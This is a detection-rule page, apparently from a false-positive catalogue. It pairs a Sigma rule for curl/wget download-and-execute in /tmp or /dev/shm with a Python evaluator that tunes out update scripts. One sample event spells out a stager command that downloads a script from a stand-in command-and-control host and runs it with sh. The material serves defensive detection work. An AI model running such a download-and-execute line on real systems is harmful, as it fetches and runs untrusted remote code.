LoFP / system update scripts using temporary files

Techniques

Sample rules

Suspicious Download and Execute Pattern via Curl/Wget

Description

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.

Detection logic

condition: all of selection_*
selection_downloader:
  CommandLine|contains:
  - /curl
  - /wget
selection_executor:
  CommandLine|contains: sh -c
selection_tmp:
  CommandLine|contains:
  - /tmp/
  - /dev/shm/
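The rule reads as three independent substring checks joined by "all of selection_*": one selection is a list (any listed value satisfies it) and all three selections must hold for the same CommandLine. The following Python evaluator is an added example, not code from the LoFP page or from the rule's project; it transcribes the selections, runs them over constructed process events (hosts use the reserved .invalid TLD), and shows how the false positive this entry describes, a system update script staging its payload in /tmp, can be filtered by parent process. The allowlisted parent image `/usr/local/sbin/update-agent` is a hypothetical placeholder, as is the `ParentImage` field name assumed on the events.

```python
"""Added example: a minimal evaluator for the Sigma-style rule above,
run over constructed process events (not real telemetry)."""

# Selections transcribed from the rule. A |contains modifier with a list
# matches if ANY listed substring is present; the condition
# "all of selection_*" then requires EVERY selection to match.
SELECTIONS = {
    "selection_downloader": ["/curl", "/wget"],
    "selection_executor": ["sh -c"],
    "selection_tmp": ["/tmp/", "/dev/shm/"],
}


def selection_matches(command_line: str, needles: list[str]) -> bool:
    # Sigma string matching is case-insensitive unless the |cased modifier is used.
    haystack = command_line.lower()
    return any(n.lower() in haystack for n in needles)


def rule_matches(event: dict) -> bool:
    """Raw rule: every selection must match the event's CommandLine."""
    cmd = event.get("CommandLine", "")
    return all(selection_matches(cmd, needles) for needles in SELECTIONS.values())


# Hypothetical parent images of approved update tooling (assumption for
# illustration; a real allowlist comes from your own environment inventory).
KNOWN_UPDATER_PARENTS = ("/usr/local/sbin/update-agent",)


def is_known_updater(event: dict) -> bool:
    return event.get("ParentImage", "").startswith(KNOWN_UPDATER_PARENTS)


def rule_matches_tuned(event: dict) -> bool:
    """Same rule, with the page's false positive (system update scripts
    staging files in /tmp) filtered by an allowlisted parent process."""
    return rule_matches(event) and not is_known_updater(event)


# Constructed sample events; nothing here was captured from a real host.
SAMPLE_EVENTS = [
    {
        "id": "stager",  # the download-and-execute pattern the rule targets
        "ParentImage": "/usr/bin/python3",
        "CommandLine": "/bin/sh -c '/usr/bin/curl -s http://c2.example.invalid/x.sh "
                       "-o /dev/shm/x.sh && sh /dev/shm/x.sh'",
    },
    {
        "id": "update_script",  # the false positive this LoFP entry describes
        "ParentImage": "/usr/local/sbin/update-agent",
        "CommandLine": "/bin/sh -c '/usr/bin/wget -q https://updates.example.invalid/patch.sh "
                       "-O /tmp/patch.sh && sh /tmp/patch.sh'",
    },
    {
        "id": "health_check",  # curl alone: no shell wrapper, no temp path
        "ParentImage": "/usr/bin/bash",
        "CommandLine": "/usr/bin/curl -fsS https://app.example.invalid/healthz",
    },
]


def evaluate(events: list[dict]) -> dict[str, tuple[bool, bool]]:
    """Return {event id: (raw rule hit, tuned rule hit)} for each event."""
    return {e["id"]: (rule_matches(e), rule_matches_tuned(e)) for e in events}


if __name__ == "__main__":
    for event_id, (raw, tuned) in evaluate(SAMPLE_EVENTS).items():
        print(f"{event_id:14} raw={raw!s:5} tuned={tuned}")
```

Note that the tuning keeps the raw rule intact and only adds an exclusion keyed on the parent process; filtering on the script path or URL instead would be easier for an attacker to mimic, since those strings are fully under the downloader's control.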